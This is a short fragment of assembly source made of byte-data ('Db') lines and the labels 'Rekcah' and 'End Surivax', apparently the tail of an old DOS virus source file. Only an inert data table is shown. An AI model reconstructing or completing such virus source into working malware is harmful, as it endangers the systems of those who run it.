Db 8,0,8,0,8,0,8,0,0,2,2,0,12,0,52,12,0,12,0,12, 0, 0,12,0,12,52,0,59,8
Db 52,0,0,8,52,0,8,0,8,0,8,0,8,0,53,8,0,8,0,8,52,0,60,12,0,12,12,0,12,0
Db 52,12,0,62,8,0,0,8,0,8,0,8,52,0,0,8,52,0,8,8,0,8,0,8,52,0,0,2,2,0,12
Db 0,52,12,0,12,0,12,0,0,12,0,12,0,53,12,0,56,8,0,8,0, 0,8,0,8,0,8,52,0
Db 8,0,8,0,53,8,0,8,0,52,8,0,60,12,0,12,12,0,12,0,0,12,0,12,0,0,12,0,58
Db 8,0,0,8,0,8,0,52,8,8,0,8,0,8,0,8,8,0,8,0,8,0,53,2,2,0, 0, 12,12,0,12
Db 52,0,0,12,52,0,0,12,12,0,0,12,0,55,8,8,0,8,8,0,8,52,8, 0,8,0,0,8,0,8
Db 0,52,0,8,52,0,8,52,0,60,12,53,0,12,0,0,12,0,12,0,0,12,0,57, 8,52,0,8
Db 0,8,0,8,52,0,0,8,52,0,8,8,0,8,0,8,52,0,0,2,2,0,163,2,2,0, 163, 2,166

Rekcah:
End Surivax
